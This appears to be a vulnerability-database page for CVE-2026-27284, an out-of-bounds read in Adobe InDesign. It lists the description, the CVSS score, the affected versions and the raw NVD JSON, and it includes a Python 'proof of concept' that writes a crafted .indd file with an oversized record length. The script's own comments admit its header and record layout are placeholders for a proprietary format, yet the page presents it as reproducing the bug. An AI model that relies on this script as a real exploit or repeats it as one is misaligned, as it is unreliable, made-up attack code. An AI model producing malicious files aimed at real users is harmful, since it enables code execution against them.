Security Vulnerability Report
CVE-2026-27284 CVSS 7.8 HIGH

CVE-2026-27284

Published: 2026-04-14 17:16:48
Last Modified: 2026-04-16 15:35:39

Description

InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:indesign:*:*:*:*:*:*:*:* (versions before 20.5.3) - VULNERABLE
cpe:2.3:a:adobe:indesign:*:*:*:*:*:*:*:* (versions from 21.0 up to, but excluding, 21.3) - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* (platform) - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* (platform) - NOT VULNERABLE
Adobe InDesign Desktop <= 21.2
Adobe InDesign Desktop <= 20.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Proof of Concept (PoC) for CVE-2026-27284
# This script generates a crafted file intended to trigger the OOB Read.
# Usage: python poc.py
import struct


def generate_malicious_file(filename):
    """
    Generates a crafted InDesign file structure.
    Note: Actual InDesign file format (.indd) is complex and proprietary.
    This is a simplified representation to demonstrate the trigger.
    """
    # Placeholder file header (Magic bytes)
    file_header = b"\x06\x06\xED\xF5\x00\x00\x00\x00"

    # Construct a malicious record
    # The size field is manipulated to force an out-of-bounds read
    record_type = struct.pack('<I', 0x4D4C4452)  # 'MLDR' placeholder

    # Large size value to trigger read past end of buffer
    malicious_size = struct.pack('<I', 0xFFFFFFFF)

    # Padding data
    padding = b"A" * 0x100

    payload = file_header + record_type + malicious_size + padding

    with open(filename, "wb") as f:
        f.write(payload)

    print(f"[+] Malicious file generated: {filename}")
    print("[+] Open this file in a vulnerable version of Adobe InDesign to reproduce the issue.")


if __name__ == "__main__":
    generate_malicious_file("cve_2026_27284_poc.indd")
```

References

https://helpx.adobe.com/security/products/indesign/apsb26-32.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27284", "sourceIdentifier": "[email protected]", "published": "2026-04-14T17:16:48.040", "lastModified": "2026-04-16T15:35:38.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:indesign:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.5.3", "matchCriteriaId": "5644C156-EB3C-4F24-A9E8-ABB5EA61F2A9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:indesign:*:*:*:*:*:*:*:*", "versionStartIncluding": "21.0", "versionEndExcluding": "21.3", "matchCriteriaId": "C6F7C5A5-F818-4184-81C3-35282D05CBEA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", 
"matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/indesign/apsb26-32.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}